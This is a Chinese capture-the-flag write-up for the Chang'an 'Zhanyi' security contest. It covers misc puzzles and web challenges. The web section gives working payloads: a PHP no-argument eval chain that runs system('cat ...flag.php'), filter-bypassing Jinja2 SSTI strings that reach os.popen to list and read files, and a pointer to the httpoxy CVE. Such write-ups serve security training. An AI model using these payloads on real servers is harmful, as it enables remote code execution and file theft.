长安“战疫”网络安全卫士守护赛writeup

长安“战疫”网络安全卫士守护赛writeup

misc

八卦迷宫

长安“战疫”网络安全卫士守护赛writeup_第1张图片

得到flag

cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}

西安加油

长安“战疫”网络安全卫士守护赛writeup_第2张图片

tcp流里面找到base64编码

长安“战疫”网络安全卫士守护赛writeup_第3张图片

在线转为zip解压

长安“战疫”网络安全卫士守护赛writeup_第4张图片

拼图得到flag

长安“战疫”网络安全卫士守护赛writeup_第5张图片

cazy{make_XiAN_great_Again}

web

RCE_No_Para


if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { 
  if(!preg_match('![img](file:///C:\Users\M1keal\AppData\Roaming\Tencent\QQTempSys\V7(XMWRN]{G8~CI}BCCR3QC.gif)ssion|end|next|header|dir/i',$_GET['code'])){
    eval($_GET['code']);
  }else{
    die("Hacker!");
  }
}else{
  show_source(__FILE__);
}
?>


参考链接

PHP Parametric Function RCE · sky’s blog (skysec.top)

长安“战疫”网络安全卫士守护赛writeup_第6张图片

所以paylaod:

?m1kael=system(“cat%20/var/www/html/flag.php”);&code=eval(current(current(get_defined_vars())));

Flask

根据提示

admin?name=payload?1.js?

然后过滤了[]和_

参考链接

以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用 - 先知社区 (aliyun.com)

所以payload:

{%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22))|attr(%22\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f%22)(%22os%22)|attr(%22popen%22)(%22ls /%22)|attr(%22read%22)()%}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IaKr1Yp7-1641715550919)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108144609879.png)]

然后

{%print(lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f"))|attr("\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f")("os")|attr("popen")("cat%20/f*")|attr("read")()%}%20.js?

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5Suv667b-1641715550920)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108145645686.png)]

Flag配送中心

CVE-2016-5385

vulhub漏洞复现 · Ywc’s blog (yinwc.github.io)

长安“战疫”网络安全卫士守护赛writeup_第7张图片
长安“战疫”网络安全卫士守护赛writeup_第8张图片

你可能感兴趣的:(web安全,安全)